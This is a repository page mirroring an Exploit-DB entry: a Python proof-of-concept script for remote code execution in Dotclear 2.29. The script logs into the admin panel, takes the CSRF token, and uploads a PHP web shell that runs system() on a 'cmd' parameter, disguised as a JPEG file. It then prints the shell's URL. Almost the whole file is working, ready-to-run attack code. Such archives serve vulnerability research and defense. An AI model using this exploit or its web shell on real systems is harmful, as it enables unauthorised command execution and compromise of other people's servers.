bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52037.py
Exploit-DB 8a32e340d5 DB: 2024-06-04 
8 changes to exploits/shellcodes/ghdb

Sitefinity 15.0 - Cross-Site Scripting (XSS)

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)

Dotclear 2.29 - Remote Code Execution (RCE)

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Serendipity 2.5.0 - Remote Code Execution (RCE)

WBCE CMS v1.6.2 - Remote Code Execution (RCE)
2024-06-04 00:16:25 +00:00

96 lines
No EOL
2.9 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 26.04.2024
# Vendor Homepage: https://git.dotclear.org/explore/repos
# Software Link:
https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
# Tested Version: v2.29 (latest)
# Tested on: MacOS
import requests
import time
import random
import string
from bs4 import BeautifulSoup
def generate_filename(extension=".inc"):
return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
extension
def get_csrf_token(response_text):
soup = BeautifulSoup(response_text, 'html.parser')
token = soup.find('input', {'name': 'xd_check'})
return token['value'] if token else None
def login(base_url, username, password):
print("Exploiting...")
time.sleep(1)
print("Logging in...")
time.sleep(1)
session = requests.Session()
login_data = {
"user_id": username,
"user_pwd": password
}
login_url = f"{base_url}/admin/index.php?process=Auth"
login_response = session.post(login_url, data=login_data)
if "Logout" in login_response.text:
print("Login Successful!")
return session
else:
print("Login Failed!")
return None
def upload_file(session, base_url, filename):
print("Shell Preparing...")
time.sleep(1)
boundary = "---------------------------376201441124932790524235275389"
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"X-Requested-With": "XMLHttpRequest"
}
csrf_token = get_csrf_token(session.get(f"{base_url}
/admin/index.php?process=Media").text)
payload = (
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
f"2097152\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
f"{csrf_token}\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}
\"\r\n"
f"Content-Type: image/jpeg\r\n\r\n"
"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
basename($_SERVER['PHP_SELF']); ?>\">\n"
"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
type=\"SUBMIT\" value=\"Execute\">\n"
"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
\n?>\n</pre>\n</body>\n</html>\r\n"
f"--{boundary}--\r\n"
)
upload_response = session.post(f"{base_url}
/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",
headers=headers, data=payload.encode('utf-8'))
if upload_response.status_code == 200:
print(f"Your Shell is Ready: {base_url}/public/{filename}")
else:
print("Exploit Failed!")
def main(base_url, username, password):
filename = generate_filename()
session = login(base_url, username, password)
if session:
upload_file(session, base_url, filename)
if __name__ == "__main__":
import sys
if len(sys.argv) != 4:
print("Usage: python script.py <siteurl> <username> <password>")
else:
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
main(base_url, username, password)
Reference in a new issue View git blame Copy permalink